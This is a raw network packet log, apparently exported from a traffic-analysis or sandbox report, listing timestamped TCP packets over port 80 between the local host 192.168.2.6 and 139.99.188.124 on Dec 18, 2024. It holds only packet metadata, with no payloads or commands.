                                                                    Dec 18, 2024 09:19:24.894900084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.894900084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.896451950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.896464109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.896811008 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.897140026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.897151947 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.897218943 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.898186922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.898197889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.898375034 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.954756021 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.022789955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.022861958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.023216009 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.023366928 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.023458958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.023740053 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.024409056 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.024516106 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.024662018 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.026546955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.026562929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.026665926 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.026930094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.027013063 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.027188063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.028086901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.028103113 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.028907061 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.028953075 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.029010057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.029757977 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.029999971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.030132055 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.030173063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.031140089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.031352997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.031409025 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.032233000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.032417059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.032553911 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.034955025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036252975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036264896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036276102 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036302090 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036314011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.036396027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.036396027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.036396027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.037194014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.046636105 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.046706915 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.046727896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.047188997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.047283888 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.047379971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.048285961 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.048336983 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.048437119 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.049441099 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.049590111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.049622059 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.050373077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.050492048 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.050674915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.051254034 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.051332951 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.051357031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.052362919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.052460909 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.052463055 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.053484917 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.053577900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.053596020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.054610014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.054692030 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.054735899 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.055676937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.055732012 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.055804968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.058903933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.058954000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.058990002 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.059005022 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.059024096 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.059045076 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.059423923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.059478045 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.059598923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.060393095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.060426950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.060483932 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.061269999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.061398029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.061567068 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.062433004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.062475920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.062534094 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.063530922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.063644886 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.063667059 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.064620018 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.064682961 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.064753056 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.065745115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.065799952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.065853119 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.066848993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.066915989 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.066971064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.068011999 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.068155050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.068161011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.069122076 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.069257021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.069295883 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.070218086 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.070271015 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.070374012 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.071347952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.071430922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.071475029 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.072529078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.072578907 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.072669983 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.073556900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.073674917 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.073683977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.074688911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.074742079 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.074812889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075845957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075925112 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.075933933 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.076916933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.077004910 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.077044010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078197956 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078288078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.078435898 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.079159975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.079266071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.079332113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.080285072 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.080365896 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.080418110 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081377029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081501961 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.081578970 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.082515955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.082648993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.082686901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.083606005 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.083647013 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.083775997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.084784985 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.084820032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.085865974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.085927010 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.085927010 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.085935116 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087008953 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087065935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.087137938 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.088087082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.088141918 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.088201046 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.089195013 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.089279890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.089319944 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.213948011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214044094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214091063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.214554071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.214601994 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.214665890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.215596914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.215703011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.215711117 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.216775894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.216846943 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.216886997 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.217856884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.218009949 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.218087912 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.218959093 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.219130993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.219217062 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.220136881 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.220172882 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.220232964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.221198082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.221304893 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.221335888 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.222332954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.222439051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.222546101 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.223464966 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.223572016 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.223623037 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.224567890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.224659920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.224752903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.225676060 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.225811005 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226105928 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.226855993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226917982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.226927042 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.227871895 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.228029013 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.237345934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237374067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237627983 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.237874031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.237957954 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.238074064 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.238993883 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.239151001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.239206076 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.240077972 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.240156889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.240689993 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.241260052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.241429090 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242306948 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242357016 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.242377043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.242965937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.243402004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.243539095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.243808031 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.244570971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.244704008 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.244848967 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.245666981 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.245718956 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.245837927 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.246790886 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.246907949 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.247935057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.248037100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.248111963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.248881102 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.249191046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.249314070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.249361038 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.250109911 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.250276089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.250322104 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.251271009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.251307964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.251360893 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.252357960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.252501011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.252571106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.253473043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.253572941 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254622936 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254699945 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.254708052 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.254961014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.255685091 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.255913973 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.256021976 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.256871939 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.257009983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.257056952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.257996082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.258042097 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.259083033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.259131908 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.259191990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260132074 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260181904 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.260256052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.260648012 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.261291027 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.261360884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.261399984 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.262403965 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.262514114 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263565063 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263611078 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.263662100 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.263967991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.264722109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.264874935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.265954971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.266007900 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.266051054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.266340017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.266860008 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.267021894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.267061949 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.267967939 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.268079042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.268125057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.269104958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.269201994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.269241095 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.270215988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.270318031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.270358086 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.271348000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.271418095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.271697998 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.272527933 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.272677898 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.272789955 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.273735046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.273782015 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.274523020 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.274694920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.274827957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275882959 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275938988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.275974035 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.275974035 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.276910067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.277034044 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.277089119 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.278217077 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.278373957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.278911114 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.279463053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.279617071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280803919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280834913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:25.280877113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:25.280877113 CET4973880192.168.2.6139.99.188.124
